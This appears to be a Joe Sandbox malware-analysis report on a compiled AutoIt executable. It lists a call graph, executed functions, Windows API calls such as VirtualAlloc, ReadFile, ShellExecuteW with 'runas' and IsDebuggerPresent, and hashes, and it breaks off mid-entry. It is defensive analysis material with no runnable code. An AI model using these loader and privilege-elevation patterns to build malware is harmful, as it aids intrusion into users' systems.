2 library calls 101404->101428 101406 8a0e5d 101405->101406 101407 8a0ef5 VirtualAlloc 101406->101407 101408 8a0ec3 101406->101408 101407->101408 101408->101358 101408->101359 101409->101369 101410->101369 101411->101362 101412->101370 101413->101376 101414->101376 101415->101376 101416->101347 101417->101376 101419 8df683 __NMSG_WRITE 101418->101419 101422 8df6b8 101419->101422 101423 8df769 101419->101423 101424 8df6c2 101419->101424 101422->101424 101426 887a24 61 API calls 101422->101426 101423->101424 101427 887a24 61 API calls 101423->101427 101424->101383 101424->101388 101425->101389 101426->101422 101427->101423 101428->101404 101430 8856dd 101429->101430 101431 885702 101429->101431 101430->101431 101433 8856ec 101430->101433 101432 887eec 59 API calls 101431->101432 101436 8e349a 101432->101436 101437 885c18 59 API calls 101433->101437 101434 8e34c9 101434->101269 101436->101434 101458 8e3436 ReadFile SetFilePointerEx 101436->101458 101459 887a84 59 API calls 2 library calls 101436->101459 101438 8e35ba 101437->101438 101440 885632 61 API calls 101438->101440 101441 8e35c8 101440->101441 101443 8e35d8 Mailbox 101441->101443 101460 88793a 61 API calls Mailbox 101441->101460 101443->101269 101445 889ba8 101444->101445 101446 889be7 101444->101446 101448 8a0ff6 Mailbox 59 API calls 101445->101448 101447 8881a7 59 API calls 101446->101447 101449 889bbb 101447->101449 101448->101449 101449->101273 101450->101244 101451->101274 101452->101245 101453->101245 101454->101251 101455->101259 101456->101267 101457->101272 101458->101436 101459->101436 101460->101443 101461->101282 101462->101327 101463->101326 101464->101288 101465->101323 101466->101323 101468 8d665e 101467->101468 101469 8d6641 101467->101469 101468->101332 101469->101468 101471 8d6621 59 API calls Mailbox 101469->101471 101471->101469 101472 110295b 101473 1102960 101472->101473 101474 1100000 GetPEB 101473->101474 101475 110296c 101474->101475 101476 1102a20 101475->101476 101477 110298a 101475->101477 101494 11032d0 9 API calls 101476->101494 101481 1102630 101477->101481 101480 1102a07 101482 1100000 GetPEB 101481->101482 101485 11026cf 101482->101485 101484 1102700 CreateFileW 101484->101485 101490 110270d 101484->101490 101486 1102729 VirtualAlloc 101485->101486 101485->101490 101492 1102830 FindCloseChangeNotification 101485->101492 101493 1102840 VirtualFree 101485->101493 101495 1103540 GetPEB 101485->101495 101487 110274a ReadFile 101486->101487 101486->101490 101487->101490 101491 1102768 VirtualAlloc 101487->101491 101488 110292a 101488->101480 101489 110291c VirtualFree 101489->101488 101490->101488 101490->101489 101491->101485 101491->101490 101492->101485 101493->101485 101494->101480 101496 110356a 101495->101496 101496->101484 101497 883633 101498 88366a 101497->101498 101499 883688 101498->101499 101500 8836e7 101498->101500 101501 8836e5 101498->101501 101502 88375d PostQuitMessage 101499->101502 101503 883695 101499->101503 101505 8836ed 101500->101505 101506 8bd31c 101500->101506 101504 8836ca DefWindowProcW 101501->101504 101512 8836d8 101502->101512 101509 8bd38f 101503->101509 101510 8836a0 101503->101510 101504->101512 101507 8836f2 101505->101507 101508 883715 SetTimer RegisterWindowMessageW 101505->101508 101547 8911d0 10 API calls Mailbox 101506->101547 101513 8836f9 KillTimer 101507->101513 101514 8bd2bf 101507->101514 101508->101512 101515 88373e CreatePopupMenu 101508->101515 101552 8e2a16 71 API calls _memset 101509->101552 101516 8836a8 101510->101516 101517 883767 101510->101517 101542 8844cb Shell_NotifyIconW _memset 101513->101542 101520 8bd2f8 MoveWindow 101514->101520 101521 8bd2c4 101514->101521 101515->101512 101523 8836b3 101516->101523 101524 8bd374 101516->101524 101545 884531 64 API calls _memset 101517->101545 101519 8bd343 101548 8911f3 331 API calls Mailbox 101519->101548 101520->101512 101528 8bd2c8 101521->101528 101529 8bd2e7 SetFocus 101521->101529 101531 88374b 101523->101531 101532 8836be 101523->101532 101524->101504 101551 8d817e 59 API calls Mailbox 101524->101551 101525 8bd3a1 101525->101504 101525->101512 101528->101532 101534 8bd2d1 101528->101534 101529->101512 101530 88370c 101543 883114 DeleteObject DestroyWindow Mailbox 101530->101543 101544 8845df 81 API calls _memset 101531->101544 101532->101504 101549 8844cb Shell_NotifyIconW _memset 101532->101549 101533 88375b 101533->101512 101546 8911d0 10 API calls Mailbox 101534->101546 101540 8bd368 101550 8843db 68 API calls _memset 101540->101550 101542->101530 101543->101512 101544->101533 101545->101533 101546->101512 101547->101519 101548->101532 101549->101540 101550->101501 101551->101501 101552->101525 101553 881055 101558 882649 101553->101558 101556 8a2f80 __cinit 67 API calls 101557 881064 101556->101557 101559 8877c7 59 API calls 101558->101559 101560 8826b7 101559->101560 101565 883582 101560->101565 101563 882754 101564 88105a 101563->101564 101568 883416 59 API calls 2 library calls 101563->101568 101564->101556 101569 8835b0 101565->101569 101568->101563 101570 8835bd 101569->101570 101571 8835a1 101569->101571 101570->101571 101572 8835c4 RegOpenKeyExW 101570->101572 101571->101563 101572->101571 101573 8835de RegQueryValueExW 101572->101573 101574 8835ff 101573->101574 101575 883614 RegCloseKey 101573->101575 101574->101575 101575->101571 101576 8bff06 101577 8bff10 101576->101577 101583 88ac90 Mailbox _memmove 101576->101583 101676 888e34 59 API calls Mailbox 101577->101676 101580 88b685 101681 8ea0b5 89 API calls 4 library calls 101580->101681 101582 8a0ff6 59 API calls Mailbox 101590 88a097 Mailbox 101582->101590 101583->101580 101589 88a1b7 101583->101589 101583->101590 101597 887f41 59 API calls 101583->101597 101606 8fbf80 331 API calls 101583->101606 101607 8d66f4 Mailbox 59 API calls 101583->101607 101609 88b416 101583->101609 101611 88a000 331 API calls 101583->101611 101612 8c0c94 101583->101612 101614 8c0ca2 101583->101614 101617 88b37c 101583->101617 101618 8a0ff6 59 API calls Mailbox 101583->101618 101625 88ade2 Mailbox 101583->101625 101633 8fc5f4 101583->101633 101665 8e7be0 101583->101665 101677 8d7405 59 API calls 101583->101677 101678 8fc4a7 85 API calls 2 library calls 101583->101678 101585 88b5d5 101592 8881a7 59 API calls 101585->101592 101587 88b5da 101685 8ea0b5 89 API calls 4 library calls 101587->101685 101590->101582 101590->101585 101590->101587 101590->101589 101593 8c047f 101590->101593 101594 8877c7 59 API calls 101590->101594 101596 8881a7 59 API calls 101590->101596 101600 8a2f80 67 API calls __cinit 101590->101600 101602 8d7405 59 API calls 101590->101602 101604 8c0e00 101590->101604 101608 88a6ba 101590->101608 101671 88ca20 331 API calls 2 library calls 101590->101671 101672 88ba60 60 API calls Mailbox 101590->101672 101592->101589 101680 8ea0b5 89 API calls 4 library calls 101593->101680 101594->101590 101596->101590 101597->101583 101599 8c048e 101600->101590 101602->101590 101603 8d66f4 Mailbox 59 API calls 101603->101589 101684 8ea0b5 89 API calls 4 library calls 101604->101684 101606->101583 101607->101583 101683 8ea0b5 89 API calls 4 library calls 101608->101683 101675 88f803 331 API calls 101609->101675 101611->101583 101613 889df0 Mailbox 59 API calls 101612->101613 101616 8c0c86 101613->101616 101682 8ea0b5 89 API calls 4 library calls 101614->101682 101616->101589 101616->101603 101673 889e9c 60 API calls Mailbox 101617->101673 101618->101583 101620 88b38d 101674 889e9c 60 API calls Mailbox 101620->101674 101624 889df0 Mailbox 59 API calls 101624->101625 101625->101580 101625->101589 101625->101616 101625->101624 101626 8c00e0 VariantClear 101625->101626 101627 8f474d 331 API calls 101625->101627 101628 8fe24b 130 API calls 101625->101628 101629 8fe237 130 API calls 101625->101629 101630 8ed2e6 101 API calls 101625->101630 101631 892123 95 API calls 101625->101631 101632 8ed2e5 101 API calls 101625->101632 101679 8d7405 59 API calls 101625->101679 101626->101625 101627->101625 101628->101625 101629->101625 101630->101625 101631->101625 101632->101625 101634 8877c7 59 API calls 101633->101634 101635 8fc608 101634->101635 101636 8877c7 59 API calls 101635->101636 101637 8fc610 101636->101637 101638 8877c7 59 API calls 101637->101638 101639 8fc618 101638->101639 101640 889997 84 API calls 101639->101640 101654 8fc626 101640->101654 101641 887d2c 59 API calls 101641->101654 101642 8fc80f 101643 8fc83c Mailbox 101642->101643 101645 889b9c 59 API calls 101642->101645 101643->101583 101644 8fc7f6 101646 887e0b 59 API calls 101644->101646 101645->101643 101650 8fc803 101646->101650 101647 887a84 59 API calls 101647->101654 101648 8fc811 101651 887e0b 59 API calls 101648->101651 101649 8881a7 59 API calls 101649->101654 101652 887c8e 59 API calls 101650->101652 101653 8fc820 101651->101653 101652->101642 101656 887c8e 59 API calls 101653->101656 101654->101641 101654->101642 101654->101643 101654->101644 101654->101647 101654->101648 101654->101649 101655 887faf 59 API calls 101654->101655 101657 887faf 59 API calls 101654->101657 101662 889997 84 API calls 101654->101662 101663 887e0b 59 API calls 101654->101663 101664 887c8e 59 API calls 101654->101664 101658 8fc6bd CharUpperBuffW 101655->101658 101656->101642 101660 8fc77d CharUpperBuffW 101657->101660 101686 88859a 68 API calls 101658->101686 101687 88c707 69 API calls 2 library calls 101660->101687 101662->101654 101663->101654 101664->101654 101666 8e7bec 101665->101666 101667 8a0ff6 Mailbox 59 API calls 101666->101667 101668 8e7bfa 101667->101668 101669 8e7c08 101668->101669 101670 8877c7 59 API calls 101668->101670 101669->101583 101670->101669 101671->101590 101672->101590 101673->101620 101674->101609 101675->101580 101676->101583 101677->101583 101678->101583 101679->101625 101680->101599 101681->101616 101682->101616 101683->101589 101684->101587 101685->101589 101686->101654 101687->101654 101688 881016 101693 884ad2 101688->101693 101691 8a2f80 __cinit 67 API calls 101692 881025 101691->101692 101694 8a0ff6 Mailbox 59 API calls 101693->101694 101695 884ada 101694->101695 101696 88101b 101695->101696 101700 884a94 101695->101700 101696->101691 101701 884a9d 101700->101701 101702 884aaf 101700->101702 101703 8a2f80 __cinit 67 API calls 101701->101703 101704 884afe 101702->101704 101703->101702 101705 8877c7 59 API calls 101704->101705 101706 884b16 GetVersionExW 101705->101706 101707 887d2c 59 API calls 101706->101707 101708 884b59 101707->101708 101709 887e8c 59 API calls 101708->101709 101716 884b86 101708->101716 101710 884b7a 101709->101710 101711 887886 59 API calls 101710->101711 101711->101716 101712 884bf1 GetCurrentProcess IsWow64Process 101713 884c0a 101712->101713 101714 884c89 GetSystemInfo 101713->101714 101715 884c20 101713->101715 101718 884c56 101714->101718 101728 884c95 101715->101728 101716->101712 101717 8bdc8d 101716->101717 101718->101696 101721 884c7d GetSystemInfo 101724 884c47 101721->101724 101722 884c32 101723 884c95 2 API calls 101722->101723 101725 884c3a GetNativeSystemInfo 101723->101725 101724->101718 101726 884c4d FreeLibrary 101724->101726 101725->101724 101726->101718 101729 884c2e 101728->101729 101730 884c9e LoadLibraryA 101728->101730 101729->101721 101729->101722 101730->101729 101731 884caf GetProcAddress 101730->101731 101731->101729 101732 881066 101737 88f8cf 101732->101737 101734 88106c 101735 8a2f80 __cinit 67 API calls 101734->101735 101736 881076 101735->101736 101738 88f8f0 101737->101738 101770 8a0143 101738->101770 101742 88f937 101743 8877c7 59 API calls 101742->101743 101744 88f941 101743->101744 101745 8877c7 59 API calls 101744->101745 101746 88f94b 101745->101746 101747 8877c7 59 API calls 101746->101747 101748 88f955 101747->101748 101749 8877c7 59 API calls 101748->101749 101750 88f993 101749->101750 101751 8877c7 59 API calls 101750->101751 101752 88fa5e 101751->101752 101780 8960e7 101752->101780 101756 88fa90 101757 8877c7 59 API calls 101756->101757 101758 88fa9a 101757->101758 101808 89ffde 101758->101808 101760 88fae1 101761 88faf1 GetStdHandle 101760->101761 101762 88fb3d 101761->101762 101763 8c49d5 101761->101763 101764 88fb45 OleInitialize 101762->101764 101763->101762 101765 8c49de 101763->101765 101764->101734 101815 8e6dda 64 API calls Mailbox 101765->101815 101767 8c49e5 101816 8e74a9 CreateThread 101767->101816 101769 8c49f1 CloseHandle 101769->101764 101817 8a021c 101770->101817 101773 8a021c 59 API calls 101774 8a0185 101773->101774 101775 8877c7 59 API calls 101774->101775 101776 8a0191 101775->101776 101777 887d2c 59 API calls 101776->101777 101778 88f8f6 101777->101778 101779 8a03a2 6 API calls 101778->101779 101779->101742 101781 8877c7 59 API calls 101780->101781 101782 8960f7 101781->101782 101783 8877c7 59 API calls 101782->101783 101784 8960ff 101783->101784 101824 895bfd 101784->101824 101787 895bfd 59 API calls 101788 89610f 101787->101788 101789 8877c7 59 API calls 101788->101789 101790 89611a 101789->101790 101791 8a0ff6 Mailbox 59 API calls 101790->101791 101792 88fa68 101791->101792 101793 896259 101792->101793 101794 896267 101793->101794 101795 8877c7 59 API calls 101794->101795 101796 896272 101795->101796 101797 8877c7 59 API calls 101796->101797 101798 89627d 101797->101798 101799 8877c7 59 API calls 101798->101799 101800 896288 101799->101800 101801 8877c7 59 API calls 101800->101801 101802 896293 101801->101802 101803 895bfd 59 API calls 101802->101803 101804 89629e 101803->101804 101805 8a0ff6 Mailbox 59 API calls 101804->101805 101806 8962a5 RegisterWindowMessageW 101805->101806 101806->101756 101809 89ffee 101808->101809 101810 8d5cc3 101808->101810 101811 8a0ff6 Mailbox 59 API calls 101809->101811 101827 8e9d71 60 API calls 101810->101827 101813 89fff6 101811->101813 101813->101760 101814 8d5cce 101815->101767 101816->101769 101828 8e748f 65 API calls 101816->101828 101818 8877c7 59 API calls 101817->101818 101819 8a0227 101818->101819 101820 8877c7 59 API calls 101819->101820 101821 8a022f 101820->101821 101822 8877c7 59 API calls 101821->101822 101823 8a017b 101822->101823 101823->101773 101825 8877c7 59 API calls 101824->101825 101826 895c05 101825->101826 101826->101787 101827->101814 101829 88e736 101832 88d260 101829->101832 101831 88e744 101833 88d27d 101832->101833 101861 88d4dd 101832->101861 101834 8c2b0a 101833->101834 101835 8c2abb 101833->101835 101864 88d2a4 101833->101864 101876 8fa6fb 331 API calls __cinit 101834->101876 101838 8c2abe 101835->101838 101846 8c2ad9 101835->101846 101839 8c2aca 101838->101839 101838->101864 101874 8fad0f 331 API calls 101839->101874 101840 8a2f80 __cinit 67 API calls 101840->101864 101843 88d594 101868 888bb2 68 API calls 101843->101868 101844 8c2cdf 101844->101844 101845 88d6ab 101845->101831 101846->101861 101875 8fb1b7 331 API calls 3 library calls 101846->101875 101850 88d5a3 101850->101831 101851 8c2c26 101880 8faa66 89 API calls 101851->101880 101854 888620 69 API calls 101854->101864 101861->101845 101881 8ea0b5 89 API calls 4 library calls 101861->101881 101862 88a000 331 API calls 101862->101864 101863 8881a7 59 API calls 101863->101864 101864->101840 101864->101843 101864->101845 101864->101851 101864->101854 101864->101861 101864->101862 101864->101863 101866 8888a0 68 API calls __cinit 101864->101866 101867 8886a2 68 API calls 101864->101867 101869 88859a 68 API calls 101864->101869 101870 88d0dc 331 API calls 101864->101870 101871 889f3a 59 API calls Mailbox 101864->101871 101872 88d060 89 API calls 101864->101872 101873 88cedd 331 API calls 101864->101873 101877 888bb2 68 API calls 101864->101877 101878 889e9c 60 API calls Mailbox 101864->101878 101879 8d6d03 60 API calls 101864->101879 101866->101864 101867->101864 101868->101850 101869->101864 101870->101864 101871->101864 101872->101864 101873->101864 101874->101845 101875->101861 101876->101864 101877->101864 101878->101864 101879->101864 101880->101861 101881->101844

                              Executed Functions

                              Function 00883B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                              • IsDebuggerPresent.KERNEL32 ref: 00883B8C
                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 00890A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C26,009462F8,?,?,?), ref: 00890ACE
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009393F0,00000010), ref: 008BD4BC
                              • SetCurrentDirectoryW.KERNEL32(?,009462F8,?,?,?), ref: 008BD4F4
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00935D40,009462F8,?,?,?), ref: 008BD57A
                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD581
                                • Part of subcall function 00883A58: GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                • Part of subcall function 00883A58: LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                • Part of subcall function 00883A58: LoadIconW.USER32(00000063), ref: 00883A88
                                • Part of subcall function 00883A58: LoadIconW.USER32(000000A4), ref: 00883A9A
                                • Part of subcall function 00883A58: LoadIconW.USER32(000000A2), ref: 00883AAC
                                • Part of subcall function 00883A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                • Part of subcall function 00883A58: RegisterClassExW.USER32(?), ref: 00883B28
                                • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                • Part of subcall function 008839E7: ShowWindow.USER32(00000000,?,?), ref: 00883A4A
                                • Part of subcall function 008839E7: ShowWindow.USER32(00000000,?,?), ref: 00883A53
                                • Part of subcall function 008843DB: _memset.LIBCMT ref: 00884401
                                • Part of subcall function 008843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                              Strings
                              • runas, xrefs: 008BD575
                              • This is a third-party compiled AutoIt script., xrefs: 008BD4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                              • String ID: This is a third-party compiled AutoIt script.$runas
                              • API String ID: 529118366-3287110873
                              • Opcode ID: 78e9125ede460867ccbb8c27f4f29261bc471430985893ed4aad3987f4e097fb
                              • Instruction ID: 4c6c1791734bafb2091e6875fdf8e64732a7af2dabcc0b593d81b2984bcc70f9
                              • Opcode Fuzzy Hash: 78e9125ede460867ccbb8c27f4f29261bc471430985893ed4aad3987f4e097fb
                              • Instruction Fuzzy Hash: B05104B5A08249BFCF21BBB8DC15EED7B75FB46704B004065F461E22A1DAB09605EB23
                              Function 00884AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 996 884afe-884b5e call 8877c7 GetVersionExW call 887d2c 1001 884c69-884c6b 996->1001 1002 884b64 996->1002 1004 8bdb90-8bdb9c 1001->1004 1003 884b67-884b6c 1002->1003 1006 884c70-884c71 1003->1006 1007 884b72 1003->1007 1005 8bdb9d-8bdba1 1004->1005 1008 8bdba3 1005->1008 1009 8bdba4-8bdbb0 1005->1009 1010 884b73-884baa call 887e8c call 887886 1006->1010 1007->1010 1008->1009 1009->1005 1011 8bdbb2-8bdbb7 1009->1011 1019 8bdc8d-8bdc90 1010->1019 1020 884bb0-884bb1 1010->1020 1011->1003 1013 8bdbbd-8bdbc4 1011->1013 1013->1004 1015 8bdbc6 1013->1015 1018 8bdbcb-8bdbce 1015->1018 1021 884bf1-884c08 GetCurrentProcess IsWow64Process 1018->1021 1022 8bdbd4-8bdbf2 1018->1022 1023 8bdca9-8bdcad 1019->1023 1024 8bdc92 1019->1024 1020->1018 1025 884bb7-884bc2 1020->1025 1032 884c0a 1021->1032 1033 884c0d-884c1e 1021->1033 1022->1021 1026 8bdbf8-8bdbfe 1022->1026 1030 8bdc98-8bdca1 1023->1030 1031 8bdcaf-8bdcb8 1023->1031 1027 8bdc95 1024->1027 1028 884bc8-884bca 1025->1028 1029 8bdc13-8bdc19 1025->1029 1036 8bdc08-8bdc0e 1026->1036 1037 8bdc00-8bdc03 1026->1037 1027->1030 1038 8bdc2e-8bdc3a 1028->1038 1039 884bd0-884bd3 1028->1039 1040 8bdc1b-8bdc1e 1029->1040 1041 8bdc23-8bdc29 1029->1041 1030->1023 1031->1027 1042 8bdcba-8bdcbd 1031->1042 1032->1033 1034 884c89-884c93 GetSystemInfo 1033->1034 1035 884c20-884c30 call 884c95 1033->1035 1043 884c56-884c66 1034->1043 1053 884c7d-884c87 GetSystemInfo 1035->1053 1054 884c32-884c3f call 884c95 1035->1054 1036->1021 1037->1021 1044 8bdc3c-8bdc3f 1038->1044 1045 8bdc44-8bdc4a 1038->1045 1047 8bdc5a-8bdc5d 1039->1047 1048 884bd9-884be8 1039->1048 1040->1021 1041->1021 1042->1030 1044->1021 1045->1021 1047->1021 1050 8bdc63-8bdc78 1047->1050 1051 8bdc4f-8bdc55 1048->1051 1052 884bee 1048->1052 1055 8bdc7a-8bdc7d 1050->1055 1056 8bdc82-8bdc88 1050->1056 1051->1021 1052->1021 1058 884c47-884c4b 1053->1058 1061 884c41-884c45 GetNativeSystemInfo 1054->1061 1062 884c76-884c7b 1054->1062 1055->1021 1056->1021 1058->1043 1060 884c4d-884c50 FreeLibrary 1058->1060 1060->1043 1061->1058 1062->1061
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 00884B2B
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884BF8
                              • IsWow64Process.KERNEL32(00000000), ref: 00884BFF
                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00884C45
                              • FreeLibrary.KERNEL32(00000000), ref: 00884C50
                              • GetSystemInfo.KERNEL32(00000000), ref: 00884C81
                              • GetSystemInfo.KERNEL32(00000000), ref: 00884C8D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                              • String ID:
                              • API String ID: 1986165174-0
                              • Opcode ID: a6d011c72c7da3d2c8c43010cd92129f42501fccf51ff784ed4f6c0f366f4935
                              • Instruction ID: fad6916b993999c5e6e691e07ff9bc649d639e2e9988dc5e4c6ec0b6da844923
                              • Opcode Fuzzy Hash: a6d011c72c7da3d2c8c43010cd92129f42501fccf51ff784ed4f6c0f366f4935
                              • Instruction Fuzzy Hash: C691C43254EBC5DEC731DB6884611AABFE5FF26310B58495ED0CAC3B01D234E908D719
                              Function 00884FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1063 884fe9-885001 CreateStreamOnHGlobal 1064 885021-885026 1063->1064 1065 885003-88501a FindResourceExW 1063->1065 1066 8bdd5c-8bdd6b LoadResource 1065->1066 1067 885020 1065->1067 1066->1067 1068 8bdd71-8bdd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 8bdd85-8bdd90 LockResource 1068->1069 1069->1067 1070 8bdd96-8bddb4 1069->1070 1070->1067
                              APIs
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00884EEE,?,?,00000000,00000000), ref: 00884FF9
                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884EEE,?,?,00000000,00000000), ref: 00885010
                              • LoadResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD60
                              • SizeofResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD75
                              • LockResource.KERNEL32(00884EEE,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F,00000000), ref: 008BDD88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                              • String ID: SCRIPT
                              • API String ID: 3051347437-3967369404
                              • Opcode ID: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                              • Instruction ID: 0abcacc66ccd3473931b032a7eb0ee8fe620690d6c23c6398ee182826cbc15c0
                              • Opcode Fuzzy Hash: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                              • Instruction Fuzzy Hash: F4119A75200B00BFD7319B69DC68F677BB9FBC9B11F208168F416C6660DB61E8009660
                              Function 008E4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,008BE7C1), ref: 008E46A6
                              • FindFirstFileW.KERNELBASE(?,?), ref: 008E46B7
                              • FindClose.KERNEL32(00000000), ref: 008E46C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                              • Instruction ID: 3f9aba85dfc89bcb4a157bd7f9b710667798209024e7ab9bb8507ed63a989566
                              • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                              • Instruction Fuzzy Hash: CDE0D8324284006F9220B738EC5D4EA775CEE17375F100715F939C14F0E7B06A509595
                              Function 0088E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                              Download Yara Rule
                              Strings
                              • Variable must be of type 'Object'., xrefs: 008C428C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Variable must be of type 'Object'.
                              • API String ID: 0-109567571
                              • Opcode ID: 746fc7b2ac0e8e047967ec11ca56f4228e0dfc29219258908528819b440756f5
                              • Instruction ID: 086cbaaaded56ce4e3d581d240ba040e98a35dcaa68a4519966f10e06ae3db18
                              • Opcode Fuzzy Hash: 746fc7b2ac0e8e047967ec11ca56f4228e0dfc29219258908528819b440756f5
                              • Instruction Fuzzy Hash: A4A2B474A04219CFCB24EF98C480AADB7B1FF59314F248469E916EB352D771ED82CB91
                              Function 00890B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                              Download Yara Rule
                              APIs
